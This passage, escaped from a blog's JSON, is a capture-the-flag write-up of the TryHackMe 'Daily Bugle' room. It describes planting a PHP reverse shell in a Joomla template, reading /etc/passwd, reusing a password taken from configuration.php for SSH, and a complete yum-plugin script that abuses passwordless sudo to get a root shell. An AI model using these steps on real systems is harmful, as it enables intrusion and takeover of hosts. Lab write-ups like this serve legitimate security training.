data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.49846929291960596\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.49846929291960596.png?fit=311%2C91&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.49846929291960596.png?resize=311%2C91&#038;ssl=1\" alt=\"\" class=\"wp-image-707\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.49846929291960596.png?w=311&amp;ssl=1 311w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.49846929291960596.png?resize=300%2C88&amp;ssl=1 300w\" sizes=\"auto, (max-width: 311px) 100vw, 311px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Once you&#8217;re ready to head to the theme editor, Templates &#8211; Templates &#8211; Protostar Details and Files. You should see this screen.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"528\" data-attachment-id=\"708\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-03004585089902745\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.03004585089902745.png?fit=924%2C697&amp;ssl=1\" data-orig-size=\"924,697\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.03004585089902745\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.03004585089902745.png?fit=700%2C528&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.03004585089902745.png?resize=700%2C528&#038;ssl=1\" alt=\"\" class=\"wp-image-708\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.03004585089902745.png?resize=700%2C528&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.03004585089902745.png?resize=300%2C226&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.03004585089902745.png?resize=768%2C579&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.03004585089902745.png?w=924&amp;ssl=1 924w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><figcaption>We want to edit index.php, open index.php within the editor and paste all of your PHP shellcode, don&#8217;t forget to click on save!<\/figcaption><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"533\" data-attachment-id=\"709\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-35295890720824885\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.35295890720824885.png?fit=936%2C713&amp;ssl=1\" data-orig-size=\"936,713\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.35295890720824885\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.35295890720824885.png?fit=700%2C533&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.35295890720824885.png?resize=700%2C533&#038;ssl=1\" alt=\"\" class=\"wp-image-709\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.35295890720824885.png?resize=700%2C533&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.35295890720824885.png?resize=300%2C229&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.35295890720824885.png?resize=768%2C585&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.35295890720824885.png?w=936&amp;ssl=1 936w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><figcaption>Reload the website, the website should keep &#8220;loading&#8221;, as right now it&#8217;s connecting back to us the attacker on the given IP and port. If all done correctly, we should see a connection in our NC terminal.<\/figcaption><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"305\" data-attachment-id=\"710\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-8382256143953986\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8382256143953986.png?fit=889%2C387&amp;ssl=1\" data-orig-size=\"889,387\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.8382256143953986\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8382256143953986.png?fit=700%2C305&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8382256143953986.png?resize=700%2C305&#038;ssl=1\" alt=\"\" class=\"wp-image-710\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8382256143953986.png?resize=700%2C305&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8382256143953986.png?resize=300%2C131&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8382256143953986.png?resize=768%2C334&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8382256143953986.png?w=889&amp;ssl=1 889w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Now we have our shell into the system lets see what users are on this system.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/etc\/passwd<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"469\" data-attachment-id=\"711\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-752967176103981\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.752967176103981.png?fit=759%2C508&amp;ssl=1\" data-orig-size=\"759,508\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.752967176103981\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.752967176103981.png?fit=700%2C469&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.752967176103981.png?resize=700%2C469&#038;ssl=1\" alt=\"\" class=\"wp-image-711\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.752967176103981.png?resize=700%2C469&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.752967176103981.png?resize=300%2C201&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.752967176103981.png?w=759&amp;ssl=1 759w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">We have jjameson and root. Let&#8217;s try and access jjameson home; dang looks like we can&#8217;t as we don&#8217;t have the correct permissions as were only running as apache.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"515\" height=\"241\" data-attachment-id=\"712\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-7103529716237313\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7103529716237313.png?fit=515%2C241&amp;ssl=1\" data-orig-size=\"515,241\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.7103529716237313\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7103529716237313.png?fit=515%2C241&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7103529716237313.png?resize=515%2C241&#038;ssl=1\" alt=\"\" class=\"wp-image-712\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7103529716237313.png?w=515&amp;ssl=1 515w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7103529716237313.png?resize=300%2C140&amp;ssl=1 300w\" sizes=\"auto, (max-width: 515px) 100vw, 515px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Let&#8217;s see if we can sudo -l, sadly no luck here. Let&#8217;s see what distro is running here as we need to get higher permissions if we do want to get the last two flags!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"266\" data-attachment-id=\"713\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-43487071377235387\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.43487071377235387.png?fit=853%2C324&amp;ssl=1\" data-orig-size=\"853,324\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.43487071377235387\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.43487071377235387.png?fit=700%2C266&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.43487071377235387.png?resize=700%2C266&#038;ssl=1\" alt=\"\" class=\"wp-image-713\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.43487071377235387.png?resize=700%2C266&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.43487071377235387.png?resize=300%2C114&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.43487071377235387.png?resize=768%2C292&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.43487071377235387.png?w=853&amp;ssl=1 853w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">It doesn&#8217;t look like much here can help us sadly, let&#8217;s have a more in-depth look into the Joomla setup.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cd \/var\/www\/html &amp;&amp; ls<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"209\" height=\"501\" data-attachment-id=\"714\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-4537950024380051\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.4537950024380051.png?fit=209%2C501&amp;ssl=1\" data-orig-size=\"209,501\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.4537950024380051\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.4537950024380051.png?fit=209%2C501&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.4537950024380051.png?resize=209%2C501&#038;ssl=1\" alt=\"\" class=\"wp-image-714\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.4537950024380051.png?w=209&amp;ssl=1 209w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.4537950024380051.png?resize=125%2C300&amp;ssl=1 125w\" sizes=\"auto, (max-width: 209px) 100vw, 209px\" \/><figcaption>Lot&#8217;s of files here. But, that configuration.php file looks like it might be of some use to us let&#8217;s cat it.<\/figcaption><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Using cat, we can see the file has much information, but the &#8220;password&#8221; really stands out here, I wonder if that gives us ssh access to jjameson?<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"412\" data-attachment-id=\"715\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-15997637486176663\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15997637486176663.png?fit=840%2C494&amp;ssl=1\" data-orig-size=\"840,494\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.15997637486176663\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15997637486176663.png?fit=700%2C412&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15997637486176663.png?resize=700%2C412&#038;ssl=1\" alt=\"\" class=\"wp-image-715\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15997637486176663.png?resize=700%2C412&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15997637486176663.png?resize=300%2C176&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15997637486176663.png?resize=768%2C452&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15997637486176663.png?w=840&amp;ssl=1 840w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"259\" data-attachment-id=\"716\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-565874191677952\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.565874191677952.png?fit=804%2C297&amp;ssl=1\" data-orig-size=\"804,297\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.565874191677952\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.565874191677952.png?fit=700%2C259&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.565874191677952.png?resize=700%2C259&#038;ssl=1\" alt=\"\" class=\"wp-image-716\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.565874191677952.png?resize=700%2C259&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.565874191677952.png?resize=300%2C111&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.565874191677952.png?resize=768%2C284&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.565874191677952.png?w=804&amp;ssl=1 804w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><figcaption>We now have ssh access to jjameson! And with this, we can claim <strong>Flag4 <\/strong>in user.txt within jjameson&#8217;s home folder.<\/figcaption><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Now we need to get Flag5, and we can complete this room, the only issue here is. Flag5 is root access only, and we don&#8217;t have root access. I guess it&#8217;s time to bypass our restrictions and get root!<\/p>\n\n\n\n<p class=\"has-text-align-center\">If we use the command sudo -l we can see<br>&#8220;(ALL) NOPASSWD: \/usr\/bin\/yum&#8221;, we can abuse yum and get root!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"300\" data-attachment-id=\"717\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-006512117838239129\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.006512117838239129.png?fit=820%2C351&amp;ssl=1\" data-orig-size=\"820,351\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.006512117838239129\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.006512117838239129.png?fit=700%2C300&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.006512117838239129.png?resize=700%2C300&#038;ssl=1\" alt=\"\" class=\"wp-image-717\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.006512117838239129.png?resize=700%2C300&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.006512117838239129.png?resize=300%2C128&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.006512117838239129.png?resize=768%2C329&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.006512117838239129.png?w=820&amp;ssl=1 820w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Using the following:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>TF=$(mktemp -d)\ncat >$TF\/x&lt;&lt;EOF\n&#91;main]\nplugins=1\npluginpath=$TF\npluginconfpath=$TF\nEOF\n\ncat >$TF\/y.conf&lt;&lt;EOF\n&#91;main]\nenabled=1\nEOF\n\ncat >$TF\/y.py&lt;&lt;EOF\nimport os\nimport yum\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\nrequires_api_version='2.1'\ndef init_hook(conduit):\n  os.execl('\/bin\/sh','\/bin\/sh')\nEOF\n\nsudo yum -c $TF\/x --enableplugin=y<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"683\" data-attachment-id=\"718\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-7687067563184239\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7687067563184239.png?fit=809%2C789&amp;ssl=1\" data-orig-size=\"809,789\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.7687067563184239\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7687067563184239.png?fit=700%2C683&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7687067563184239.png?resize=700%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-718\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7687067563184239.png?resize=700%2C683&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7687067563184239.png?resize=300%2C293&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7687067563184239.png?resize=768%2C749&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7687067563184239.png?w=809&amp;ssl=1 809w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><figcaption>We abused yum to successfully gain a root shell.<\/figcaption><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"719\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-1950490503525889\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.1950490503525889.png?fit=351%2C131&amp;ssl=1\" data-orig-size=\"351,131\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.1950490503525889\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.1950490503525889.png?fit=351%2C131&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.1950490503525889.png?resize=351%2C131&#038;ssl=1\" alt=\"\" class=\"wp-image-719\" width=\"351\" height=\"131\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.1950490503525889.png?w=351&amp;ssl=1 351w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.1950490503525889.png?resize=300%2C112&amp;ssl=1 300w\" sizes=\"auto, (max-width: 351px) 100vw, 351px\" \/><figcaption>We got root! We can now get the last flag, and <strong>Flag5 <\/strong>is within \/root\/root.txt<\/figcaption><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">That&#8217;s it! We started off gaining admin access to Joomla; we uploaded a shell and gained access to the system. We used our shell to gain higher permissions and now were root!<\/p>\n\n\n\n<p class=\"has-text-align-center\">This room created by TryHackMe. Thank you so much for the fun room!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>TryHackMe Room: https:\/\/tryhackme.com\/room\/dailybugleDifficulty Rated: Hard. 